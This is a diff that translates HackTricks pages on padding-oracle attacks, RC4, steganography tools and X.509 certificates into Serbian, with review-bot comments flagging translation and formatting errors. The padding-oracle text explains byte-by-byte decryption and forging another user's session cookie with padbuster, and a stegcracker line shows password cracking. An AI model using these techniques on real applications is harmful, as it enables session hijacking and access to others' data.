@@ -82,31 +72,30 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes ( - `C12 = I12 ^ E4` - ... -Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7` +Sada, moguće je **modifikovati `E7` dok `C15` ne bude `0x01`**, što će takođe biti ispravan padding. Dakle, u ovom slučaju: `\x01 = I15 ^ E'7` -So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7` +Dakle, pronalaženjem E'7, **moguće je izračunati I15**: `I15 = 0x01 ^ E'7` -Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` +Što nam omogućava da **izračunamo C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`. +Znajući **C15**, sada je moguće **izračunati C14**, ali ovaj put brute-forcing padding `\x02\x02`. -This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\ -Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** +Ovaj BF je jednako složen kao prethodni jer je moguće izračunati `E''15` čija je vrednost 0x02: `E''7 = \x02 ^ I15` tako da je samo potrebno pronaći **`E'14`** koji generiše **`C14` jednako `0x02`**.\ +Zatim, uradite iste korake da dekriptujete C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**Follow this chain until you decrypt the whole encrypted text.** +**Pratite chain dok ne dekriptujete ceo enkriptovani tekst.** -### Detection of the vulnerability +### Detekcija ranjivosti -Register and account and log in with this account .\ -If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. 
If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t. +Registrujte se i prijavite sa ovim nalogom.\ +Ako se **prijavljujete više puta** i uvek dobijate **isti cookie**, verovatno postoji **nešto** **pogrešno** u aplikaciji. **Cookie koji se vraća treba da bude jedinstven** svaki put kada se prijavite. Ako je cookie **uvek** **isti**, verovatno će uvek biti važeći i neće biti načina da se **poništi**. -Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ -But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. +Sada, ako pokušate da **modifikujete** **cookie**, možete videti da dobijate **grešku** iz aplikacije.\ +Ali ako BF-ujete padding (koristeći padbuster na primer) uspete da dobijete drugi cookie važeći za drugog korisnika. Ovaj scenario je veoma verovatno ranjiv na padbuster. -### References +### Reference - [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation) -{% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index dc89fa296..df4c6bf33 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md 
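Review bot: "cookie" is left untranslated throughout this hunk (`+Ako se **prijavljujete više puta** i uvek dobijate **isti cookie**`, `+Sada, ako pokušate da **modifikujete** **cookie**`), whereas the previous hunk of the same file uses "kolačić" (`+Da biste testirali da li je kolačić sajta ranjiv`); settle on one term. `+**Pratite chain dok ne dekriptujete ceo enkriptovani tekst.**` leaves "chain" in English ("Pratite lanac ..."). `+Registrujte se i prijavite sa ovim nalogom.` drops the account creation that the clumsy source line `-Register and account and log in with this account .` was describing; "Registrujte nalog i prijavite se sa njim." keeps the meaning. Finally, the translation faithfully reproduces the source's mixed indices in the second brute-force step: the prose asks to find `E'14`, but the formula that follows, `C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`, modifies byte 6 of the previous block (`E''6`), in line with `E''7 = \x02 ^ I15` for byte 7; since these lines are being rewritten anyway, aligning the prose with the formula (`E''6`) would fix the inconsistency instead of translating it.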
@@ -1,8 +1,8 @@ {{#include ../banners/hacktricks-training.md}} -If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. +Ako možete na neki način enkriptovati običan tekst koristeći RC4, možete dekriptovati bilo koji sadržaj enkriptovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju enkripcije. -If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: +Ako možete enkriptovati poznati običan tekst, možete takođe izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} diff --git a/src/crypto-and-stego/stego-tricks.md b/src/crypto-and-stego/stego-tricks.md index 91ed86406..22f15695c 100644 --- a/src/crypto-and-stego/stego-tricks.md +++ b/src/crypto-and-stego/stego-tricks.md 
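Review bot: `+Ako možete na neki način enkriptovati običan tekst koristeći RC4` and `+Ako možete enkriptovati poznati običan tekst` translate "plaintext" as "običan tekst", while padding-oracle-priv.md in this same commit uses "čist tekst" (`+... i čak **enkriptovati bilo koji čist tekst**`). Use one term across the crypto pages so readers searching the translated book find both.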
@@ -2,50 +2,41 @@ {{#include ../banners/hacktricks-training.md}} -## **Extracting Data from Files** +## **Ekstrakcija podataka iz fajlova** ### **Binwalk** -A tool for searching binary files for embedded hidden files and data. It's installed via `apt` and its source is available on [GitHub](https://github.com/ReFirmLabs/binwalk). - +Alat za pretragu binarnih fajlova za ugrađene skrivene fajlove i podatke. Instalira se putem `apt` i njegov izvor je dostupan na [GitHub](https://github.com/ReFirmLabs/binwalk). ```bash binwalk file # Displays the embedded data binwalk -e file # Extracts the data binwalk --dd ".*" file # Extracts all data ``` - ### **Foremost** -Recovers files based on their headers and footers, useful for png images. Installed via `apt` with its source on [GitHub](https://github.com/korczis/foremost). - +Obnavlja fajlove na osnovu njihovih zaglavlja i podnožja, korisno za png slike. Instalira se putem `apt` sa svojim izvorom na [GitHub](https://github.com/korczis/foremost). ```bash foremost -i file # Extracts data ``` - ### **Exiftool** -Helps to view file metadata, available [here](https://www.sno.phy.queensu.ca/~phil/exiftool/). - +Pomaže u prikazivanju metapodataka datoteka, dostupno [here](https://www.sno.phy.queensu.ca/~phil/exiftool/). ```bash exiftool file # Shows the metadata ``` - ### **Exiv2** -Similar to exiftool, for metadata viewing. Installable via `apt`, source on [GitHub](https://github.com/Exiv2/exiv2), and has an [official website](http://www.exiv2.org/). - +Slično exiftool-u, za pregled metapodataka. Instalira se putem `apt`, izvor na [GitHub](https://github.com/Exiv2/exiv2), i ima [službenu veb stranicu](http://www.exiv2.org/). ```bash exiv2 file # Shows the metadata ``` +### **Datoteka** -### **File** +Identifikujte tip datoteke s kojom se bavite. -Identify the type of file you're dealing with. - -### **Strings** - -Extracts readable strings from files, using various encoding settings to filter the output. 
+### **Stringovi** +Izvlači čitljive stringove iz datoteka, koristeći različite postavke kodiranja za filtriranje izlaza. ```bash strings -n 6 file # Extracts strings with a minimum length of 6 strings -n 6 file | head -n 20 # First 20 strings 
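Review bot: `+### **Datoteka**` and `+### **Stringovi**` translate the names of the `file` and `strings` commands; these headings label tools (the code block under the second one runs `strings -n 6 file`), so keep them as `### **File**` / `### **Strings**` like `### **Binwalk**` and `### **Exiftool**` in the same hunk, or put the command in backticks inside the heading. Also `+Pomaže u prikazivanju metapodataka datoteka, dostupno [here](https://www.sno.phy.queensu.ca/~phil/exiftool/).` leaves the link text "here" untranslated ("dostupan [ovde](...)"), and the blank lines before every ```bash fence in this hunk (the `-` lines after the Binwalk, Foremost, Exiftool and Exiv2 descriptions) were removed, which changes formatting beyond the translation.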
@@ -57,95 +48,84 @@ strings -e b -n 6 file # 16bit strings (big-endian) strings -e L -n 6 file # 32bit strings (little-endian) strings -e B -n 6 file # 32bit strings (big-endian) ``` +### **Poređenje (cmp)** -### **Comparison (cmp)** - -Useful for comparing a modified file with its original version found online. - +Koristan za poređenje izmenjene datoteke sa njenom originalnom verzijom koja se može pronaći na mreži. ```bash cmp original.jpg stego.jpg -b -l ``` +## **Ekstrakcija Skrivenih Podataka u Tekstu** -## **Extracting Hidden Data in Text** +### **Skriveni Podaci u Prostorima** -### **Hidden Data in Spaces** +Nevidljivi karakteri u naizgled praznim prostorima mogu skrivati informacije. Da biste ekstraktovali ove podatke, posetite [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder). -Invisible characters in seemingly empty spaces may hide information. To extract this data, visit [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder). +## **Ekstrakcija Podataka iz Slika** -## **Extracting Data from Images** - -### **Identifying Image Details with GraphicMagick** - -[GraphicMagick](https://imagemagick.org/script/download.php) serves to determine image file types and identify potential corruption. Execute the command below to inspect an image: +### **Identifikacija Detalja Slike sa GraphicMagick** +[GraphicMagick](https://imagemagick.org/script/download.php) služi za određivanje tipova fajlova slika i identifikaciju potencijalne korupcije. 
Izvršite komandu ispod da biste pregledali sliku: ```bash ./magick identify -verbose stego.jpg ``` - -To attempt repair on a damaged image, adding a metadata comment might help: - +Da biste pokušali da popravite oštećenu sliku, dodavanje komentara u metapodacima može pomoći: ```bash ./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg ``` +### **Steghide za Sakrivanje Podataka** -### **Steghide for Data Concealment** +Steghide olakšava skrivanje podataka unutar `JPEG, BMP, WAV, i AU` fajlova, sposoban je za ugrađivanje i vađenje enkriptovanih podataka. Instalacija je jednostavna koristeći `apt`, a njegov [izvorni kod je dostupan na GitHub-u](https://github.com/StefanoDeVuono/steghide). -Steghide facilitates hiding data within `JPEG, BMP, WAV, and AU` files, capable of embedding and extracting encrypted data. Installation is straightforward using `apt`, and its [source code is available on GitHub](https://github.com/StefanoDeVuono/steghide). +**Komande:** -**Commands:** +- `steghide info file` otkriva da li fajl sadrži skrivene podatke. +- `steghide extract -sf file [--passphrase password]` važi skrivene podatke, lozinka je opcionalna. -- `steghide info file` reveals if a file contains hidden data. -- `steghide extract -sf file [--passphrase password]` extracts the hidden data, password optional. +Za vađenje putem veba, posetite [ovu veb stranicu](https://futureboy.us/stegano/decinput.html). -For web-based extraction, visit [this website](https://futureboy.us/stegano/decinput.html). 
- -**Bruteforce Attack with Stegcracker:** - -- To attempt password cracking on Steghide, use [stegcracker](https://github.com/Paradoxis/StegCracker.git) as follows: +**Bruteforce Napad sa Stegcracker-om:** +- Da biste pokušali da probijete lozinku na Steghide-u, koristite [stegcracker](https://github.com/Paradoxis/StegCracker.git) na sledeći način: ```bash stegcracker [] ``` +### **zsteg za PNG i BMP fajlove** -### **zsteg for PNG and BMP Files** +zsteg se specijalizuje za otkrivanje skrivenih podataka u PNG i BMP fajlovima. Instalacija se vrši putem `gem install zsteg`, sa svojim [izvorom na GitHub-u](https://github.com/zed-0xff/zsteg). -zsteg specializes in uncovering hidden data in PNG and BMP files. Installation is done via `gem install zsteg`, with its [source on GitHub](https://github.com/zed-0xff/zsteg). +**Komande:** -**Commands:** +- `zsteg -a file` primenjuje sve metode detekcije na fajl. +- `zsteg -E file` specificira payload za ekstrakciju podataka. -- `zsteg -a file` applies all detection methods on a file. -- `zsteg -E file` specifies a payload for data extraction. +### **StegoVeritas i Stegsolve** -### **StegoVeritas and Stegsolve** +**stegoVeritas** proverava metapodatke, vrši transformacije slika i primenjuje LSB brute forcing među ostalim funkcijama. Koristite `stegoveritas.py -h` za punu listu opcija i `stegoveritas.py stego.jpg` da izvršite sve provere. -**stegoVeritas** checks metadata, performs image transformations, and applies LSB brute forcing among other features. Use `stegoveritas.py -h` for a full list of options and `stegoveritas.py stego.jpg` to execute all checks. +**Stegsolve** primenjuje razne filtere boja kako bi otkrio skrivene tekstove ili poruke unutar slika. Dostupan je na [GitHub-u](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve). -**Stegsolve** applies various color filters to reveal hidden texts or messages within images. 
It's available on [GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve). +### **FFT za detekciju skrivenog sadržaja** -### **FFT for Hidden Content Detection** - -Fast Fourier Transform (FFT) techniques can unveil concealed content in images. Useful resources include: +Fast Fourier Transform (FFT) tehnike mogu otkriti skrivene sadržaje u slikama. Korisni resursi uključuju: - [EPFL Demo](http://bigwww.epfl.ch/demo/ip/demos/FFT/) - [Ejectamenta](https://www.ejectamenta.com/Fourifier-fullscreen/) -- [FFTStegPic on GitHub](https://github.com/0xcomposure/FFTStegPic) +- [FFTStegPic na GitHub-u](https://github.com/0xcomposure/FFTStegPic) -### **Stegpy for Audio and Image Files** +### **Stegpy za audio i slikovne fajlove** -Stegpy allows embedding information into image and audio files, supporting formats like PNG, BMP, GIF, WebP, and WAV. It's available on [GitHub](https://github.com/dhsdshdhk/stegpy). +Stegpy omogućava ugrađivanje informacija u slikovne i audio fajlove, podržavajući formate kao što su PNG, BMP, GIF, WebP i WAV. Dostupan je na [GitHub-u](https://github.com/dhsdshdhk/stegpy). -### **Pngcheck for PNG File Analysis** - -To analyze PNG files or to validate their authenticity, use: +### **Pngcheck za analizu PNG fajlova** +Za analizu PNG fajlova ili za validaciju njihove autentičnosti, koristite: ```bash apt-get install pngcheck pngcheck stego.png ``` +### **Dodatni alati za analizu slika** -### **Additional Tools for Image Analysis** - -For further exploration, consider visiting: +Za dalju istraživanje, razmotrite posetu: - [Magic Eye Solver](http://magiceye.ecksdee.co.uk/) - [Image Error Level Analysis](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/) 
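Review bot: `+- `steghide extract -sf file [--passphrase password]` važi skrivene podatke, lozinka je opcionalna.` has a meaning-changing typo: "važi" means "is valid"; the source `extracts the hidden data` calls for "vadi" or "izvlači". `+### **Skriveni Podaci u Prostorima**` renders "Spaces" as physical space ("prostori"); the section is about whitespace characters, so "razmacima" is the right word. `+Za dalju istraživanje, razmotrite posetu:` needs "Za dalje istraživanje". Separately, this hunk title-cases Serbian headings (`+## **Ekstrakcija Skrivenih Podataka u Tekstu**`, `+### **Identifikacija Detalja Slike sa GraphicMagick**`, `+**Bruteforce Napad sa Stegcracker-om:**`) while later headings in the same file use sentence case (`+### **zsteg za PNG i BMP fajlove**`, `+### **Pngcheck za analizu PNG fajlova**`); Serbian does not capitalise title words, so sentence case throughout.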
@@ -153,66 +133,60 @@ For further exploration, consider visiting: - [OpenStego](https://www.openstego.com/) - [DIIT](https://diit.sourceforge.net/) -## **Extracting Data from Audios** +## **Ekstrakcija podataka iz audio zapisa** -**Audio steganography** offers a unique method to conceal information within sound files. Different tools are utilized for embedding or retrieving hidden content. +**Audio steganografija** nudi jedinstvenu metodu za skrivanje informacija unutar zvučnih datoteka. Različiti alati se koriste za umetanje ili preuzimanje skrivenog sadržaja. ### **Steghide (JPEG, BMP, WAV, AU)** -Steghide is a versatile tool designed for hiding data in JPEG, BMP, WAV, and AU files. Detailed instructions are provided in the [stego tricks documentation](stego-tricks.md#steghide). +Steghide je svestran alat dizajniran za skrivanje podataka u JPEG, BMP, WAV i AU datotekama. Detaljna uputstva su dostupna u [stego tricks dokumentaciji](stego-tricks.md#steghide). ### **Stegpy (PNG, BMP, GIF, WebP, WAV)** -This tool is compatible with a variety of formats including PNG, BMP, GIF, WebP, and WAV. For more information, refer to [Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav). +Ovaj alat je kompatibilan sa raznim formatima uključujući PNG, BMP, GIF, WebP i WAV. Za više informacija, pogledajte [Stegpy-evu sekciju](stego-tricks.md#stegpy-png-bmp-gif-webp-wav). ### **ffmpeg** -ffmpeg is crucial for assessing the integrity of audio files, highlighting detailed information and pinpointing any discrepancies. - +ffmpeg je ključan za procenu integriteta audio datoteka, ističući detaljne informacije i ukazujući na bilo kakve nesuglasice. ```bash ffmpeg -v info -i stego.mp3 -f null - ``` - ### **WavSteg (WAV)** -WavSteg excels in concealing and extracting data within WAV files using the least significant bit strategy. It is accessible on [GitHub](https://github.com/ragibson/Steganography#WavSteg). 
Commands include: - +WavSteg se odlično snalazi u skrivanju i vađenju podataka unutar WAV fajlova koristeći strategiju najmanje značajnog bita. Dostupan je na [GitHub](https://github.com/ragibson/Steganography#WavSteg). Komande uključuju: ```bash python3 WavSteg.py -r -b 1 -s soundfile -o outputfile python3 WavSteg.py -r -b 2 -s soundfile -o outputfile ``` - ### **Deepsound** -Deepsound allows for the encryption and detection of information within sound files using AES-256. It can be downloaded from [the official page](http://jpinsoft.net/deepsound/download.aspx). +Deepsound omogućava enkripciju i detekciju informacija unutar zvučnih fajlova koristeći AES-256. Može se preuzeti sa [zvanične stranice](http://jpinsoft.net/deepsound/download.aspx). ### **Sonic Visualizer** -An invaluable tool for visual and analytical inspection of audio files, Sonic Visualizer can unveil hidden elements undetectable by other means. Visit the [official website](https://www.sonicvisualiser.org/) for more. +Neprocenjiv alat za vizuelnu i analitičku inspekciju audio fajlova, Sonic Visualizer može otkriti skrivene elemente koji su nevidljivi drugim sredstvima. Posetite [zvaničnu veb stranicu](https://www.sonicvisualiser.org/) za više informacija. ### **DTMF Tones - Dial Tones** -Detecting DTMF tones in audio files can be achieved through online tools such as [this DTMF detector](https://unframework.github.io/dtmf-detect/) and [DialABC](http://dialabc.com/sound/detect/index.html). +Detekcija DTMF tonova u audio fajlovima može se postići putem online alata kao što su [ovaj DTMF detektor](https://unframework.github.io/dtmf-detect/) i [DialABC](http://dialabc.com/sound/detect/index.html). ## **Other Techniques** ### **Binary Length SQRT - QR Code** -Binary data that squares to a whole number might represent a QR code. Use this snippet to check: - +Binarni podaci koji se kvadriraju u celoj broju mogu predstavljati QR kod. 
Koristite ovaj isječak za proveru: ```python import math math.sqrt(2500) #50 ``` +Za konverziju binarnih podataka u sliku, proverite [dcode](https://www.dcode.fr/binary-image). Da biste pročitali QR kodove, koristite [ovaj online čitač barkodova](https://online-barcode-reader.inliteresearch.com/). -For binary to image conversion, check [dcode](https://www.dcode.fr/binary-image). To read QR codes, use [this online barcode reader](https://online-barcode-reader.inliteresearch.com/). +### **Prevod na Brajlu** -### **Braille Translation** +Za prevođenje Brajla, [Branah Braille Translator](https://www.branah.com/braille-translator) je odličan resurs. -For translating Braille, the [Branah Braille Translator](https://www.branah.com/braille-translator) is an excellent resource. - -## **References** +## **Reference** - [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/) - [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit) diff --git a/src/cryptography/certificates.md b/src/cryptography/certificates.md index 622b48c61..f12a29600 100644 --- a/src/cryptography/certificates.md +++ b/src/cryptography/certificates.md @@ -1,47 +1,38 @@ -# Certificates +# Sertifikati {{#include ../banners/hacktricks-training.md}} -
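Review bot: in the stego-tricks `@@ -153,66 +133,60 @@` hunk, the heading `## **Other Techniques**` stays in English because it is an unchanged context line, while every other section heading in the file was translated (`+## **Ekstrakcija podataka iz audio zapisa**`); it should become `## **Ostale tehnike**` in this same change. `+Binarni podaci koji se kvadriraju u celoj broju mogu predstavljati QR kod.` is ungrammatical and does not say what the snippet checks (`math.sqrt(2500) #50`, i.e. whether the length is a perfect square); "Binarni podaci čija je dužina potpun kvadrat mogu predstavljati QR kod." does. The `-` blank lines before the ffmpeg fence and around the WavSteg block were also dropped, as in the earlier hunks of this file.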
+## Šta je Sertifikat -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +**Javni ključ sertifikat** je digitalni ID koji se koristi u kriptografiji da dokaže da neko poseduje javni ključ. Uključuje detalje o ključevi, identitet vlasnika (subjekt) i digitalni potpis od poverene vlasti (izdavača). Ako softver veruje izdavaču i potpis je validan, sigurna komunikacija sa vlasnikom ključa je moguća. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +Sertifikati se uglavnom izdaju od strane [sertifikacionih tela](https://en.wikipedia.org/wiki/Certificate_authority) (CA) u [infrastrukturi javnog ključa](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) postavci. Druga metoda je [mreža poverenja](https://en.wikipedia.org/wiki/Web_of_trust), gde korisnici direktno verifikuju ključeve jedni drugih. Uobičajeni format za sertifikate je [X.509](https://en.wikipedia.org/wiki/X.509), koji se može prilagoditi specifičnim potrebama kako je navedeno u RFC 5280. -## What is a Certificate +## x509 Uobičajena Polja -A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. +### **Uobičajena Polja u x509 Sertifikatima** -Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. 
Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280. +U x509 sertifikatima, nekoliko **polja** igra ključne uloge u obezbeđivanju validnosti i sigurnosti sertifikata. Evo pregleda ovih polja: -## x509 Common Fields +- **Broj Verzije** označava verziju x509 formata. +- **Serijski Broj** jedinstveno identifikuje sertifikat unutar sistema Sertifikacione Vlasti (CA), uglavnom za praćenje opoziva. +- **Subjekt** polje predstavlja vlasnika sertifikata, što može biti mašina, pojedinac ili organizacija. Uključuje detaljnu identifikaciju kao što su: +- **Uobičajeno Ime (CN)**: Domeni pokriveni sertifikatom. +- **Zemlja (C)**, **Lokacija (L)**, **Država ili Pokrajina (ST, S, ili P)**, **Organizacija (O)**, i **Organizaciona Jedinica (OU)** pružaju geografske i organizacione detalje. +- **Istaknuto Ime (DN)** obuhvata punu identifikaciju subjekta. +- **Izdavač** detaljno opisuje ko je verifikovao i potpisao sertifikat, uključujući slična podpolja kao Subjekt za CA. +- **Period Validnosti** označen je **Ne Pre** i **Ne Posle** vremenskim oznakama, osiguravajući da sertifikat nije korišćen pre ili posle određenog datuma. +- **Javni Ključ** sekcija, ključna za sigurnost sertifikata, specificira algoritam, veličinu i druge tehničke detalje javnog ključa. +- **x509v3 ekstenzije** poboljšavaju funkcionalnost sertifikata, specificirajući **Korišćenje Ključa**, **Prošireno Korišćenje Ključa**, **Alternativno Ime Subjekta**, i druge osobine za fino podešavanje primene sertifikata. -### **Common Fields in x509 Certificates** - -In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields: - -- **Version Number** signifies the x509 format's version. 
-- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking. -- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as: - - **Common Name (CN)**: Domains covered by the certificate. - - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details. - - **Distinguished Name (DN)** encapsulates the full subject identification. -- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA. -- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date. -- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key. -- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application. - -#### **Key Usage and Extensions** - -- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment. -- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication. -- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively. -- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys. -- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status. 
-- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate. +#### **Korišćenje Ključa i Ekstenzije** +- **Korišćenje Ključa** identifikuje kriptografske primene javnog ključa, kao što su digitalni potpis ili enkripcija ključa. +- **Prošireno Korišćenje Ključa** dodatno sužava slučajeve korišćenja sertifikata, npr. za TLS autentifikaciju servera. +- **Alternativno Ime Subjekta** i **Osnovna Ograničenja** definišu dodatne nazive hostova pokrivene sertifikatom i da li je to CA ili sertifikat krajnjeg entiteta, respektivno. +- Identifikatori kao što su **Identifikator Ključa Subjekta** i **Identifikator Ključa Vlasti** osiguravaju jedinstvenost i praćenje ključeva. +- **Pristup Informacijama o Vlasti** i **Tačke Distribucije CRL** pružaju puteve za verifikaciju izdavača CA i proveru statusa opoziva sertifikata. +- **CT Precertifikat SCTs** nude transparente dnevnike, što je ključno za javno poverenje u sertifikat. ```python # Example of accessing and using x509 certificate fields programmatically: from cryptography import x509 @@ -49,8 +40,8 @@ from cryptography.hazmat.backends import default_backend # Load an x509 certificate (assuming cert.pem is a certificate file) with open("cert.pem", "rb") as file: - cert_data = file.read() - certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) +cert_data = file.read() +certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) # Accessing fields serial_number = certificate.serial_number 
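Review bot: in the certificates `@@ -1,47 +1,38 @@` hunk, the three sub-items of the Subject field lose their indentation (`-  - **Common Name (CN)**: ...` becomes `+- **Uobičajeno Ime (CN)**: ...`, and likewise the C/L/ST/O/OU and DN lines), so the rendered list now shows them as fields alongside Subjekt rather than beneath it; restore the two-space indent. Terminology for "Certificate Authority" is inconsistent within the hunk: `+Sertifikati se uglavnom izdaju od strane [sertifikacionih tela](...) (CA)` versus `+**Serijski Broj** jedinstveno identifikuje sertifikat unutar sistema Sertifikacione Vlasti (CA)`, `+**Identifikator Ključa Vlasti**` and `+**Pristup Informacijama o Vlasti**` ("vlast" reads as governmental authority; "sertifikaciono telo" / "izdavalac" is the established term). Smaller fixes: `+... Uključuje detalje o ključevi, identitet vlasnika ...` should be "detalje o ključu", and `+- **CT Precertifikat SCTs** nude transparente dnevnike` should read "transparentne dnevnike".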
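Review bot: the `@@ -49,8 +40,8 @@` hunk breaks the Python example: `-    cert_data = file.read()` and `-    certificate = x509.load_pem_x509_certificate(cert_data, default_backend())` become `+cert_data = file.read()` and `+certificate = ...` with no indentation, so the body of `with open("cert.pem", "rb") as file:` is empty and the snippet now fails with an IndentationError before anything runs (and even if Python accepted it, `file.read()` would execute after the `with` block had closed the file). Nothing in this hunk is translatable text, so it should be dropped from the translation commit and the four-space indent kept.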
@@ -63,133 +54,104 @@ print(f"Issuer: {issuer}") print(f"Subject: {subject}") print(f"Public Key: {public_key}") ``` +### **Razlika između OCSP i CRL distribucionih tačaka** -### **Difference between OCSP and CRL Distribution Points** +**OCSP** (**RFC 2560**) uključuje klijenta i odgovarača koji rade zajedno kako bi proverili da li je digitalni javni ključ sertifikat opozvan, bez potrebe za preuzimanjem celog **CRL**. Ova metoda je efikasnija od tradicionalnog **CRL**, koji pruža listu opozvanih serijskih brojeva sertifikata, ali zahteva preuzimanje potencijalno velikog fajla. CRL može sadržati do 512 unosa. Više detalja je dostupno [ovde](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). -**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). +### **Šta je transparentnost sertifikata** -### **What is Certificate Transparency** +Transparentnost sertifikata pomaže u borbi protiv pretnji vezanih za sertifikate osiguravajući da je izdavanje i postojanje SSL sertifikata vidljivo vlasnicima domena, CA i korisnicima. Njeni ciljevi su: -Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are: +- Sprečavanje CA da izdaju SSL sertifikate za domen bez znanja vlasnika domena. +- Uspostavljanje otvorenog sistema revizije za praćenje greškom ili zlonamerno izdatih sertifikata. 
+- Zaštita korisnika od prevarantskih sertifikata. -- Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge. -- Establishing an open auditing system for tracking mistakenly or maliciously issued certificates. -- Safeguarding users against fraudulent certificates. +#### **Sertifikati logovi** -#### **Certificate Logs** +Sertifikati logovi su javno revizibilni, samo za dodavanje zapisi sertifikata, koje održavaju mrežne usluge. Ovi logovi pružaju kriptografske dokaze za revizijske svrhe. Izdavaoci i javnost mogu podnositi sertifikate ovim logovima ili ih pretraživati radi verifikacije. Dok tačan broj log servera nije fiksiran, očekuje se da će biti manje od hiljadu globalno. Ove servere mogu nezavisno upravljati CA, ISP ili bilo koja zainteresovana strana. -Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity. +#### **Upit** -#### **Query** +Da biste istražili logove transparentnosti sertifikata za bilo koji domen, posetite [https://crt.sh/](https://crt.sh). -To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh). +Postoje različiti formati za skladištenje sertifikata, svaki sa svojim slučajevima upotrebe i 